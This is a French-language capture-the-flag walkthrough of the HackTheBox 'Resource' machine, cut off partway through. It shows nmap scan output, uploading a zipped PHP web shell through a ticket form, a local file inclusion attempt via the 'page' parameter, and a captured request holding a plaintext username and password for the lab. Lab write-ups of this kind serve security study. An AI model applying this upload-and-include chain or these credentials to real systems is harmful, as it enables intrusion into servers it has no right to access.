HACKTHEBOX - RESOURCE

Enumeration

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 d5:4f:62:39:7b:d2:22:f0:a8:8a:d9:90:35:60:56:88 (ECDSA)
|_  256 fb:67:b0:60:52:f2:12:7e:6c:13:fb:75:f2:bb:1a:ca (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://`itrc.ssg.htb`/
2222/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_  256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.25 seconds

On a 2 ports ssh, ce qui est assez unusuel. On a aussi une redirection vers itrc.ssh.htb que nous rajoutons a /etc/hosts

C'est possible de créer un case en uploadant un fichier zip.

On zip un pownyshell et on l'envoie

pour zipper :

zip shell.zip shell.php

Le lien obtenu est :

http://itrc.ssg.htb/uploads/869008b7c8415318a37657fe0cc214f5032f9123.zip

On remarque que la sélection de page se fait via un argument get

http://itrc.ssg.htb/?page=dashboard

Et si on essayait ça :

http://itrc.ssg.htb/?page=uploads/869008b7c8415318a37657fe0cc214f5032f9123.zip

Ca me ramène vers mon ticket mais sans +

   "bodySize": 37,
          "postData": {
            "mimeType": "application/x-www-form-urlencoded",
            "text": "user=msainristil&pass=82yards2closeit",
            "params": [
              {
                "name": "user",
                "value": "msainristil"
              },
              {
                "name": "pass",
                "value": "82yards2closeit"
              }
            ]
          }
        },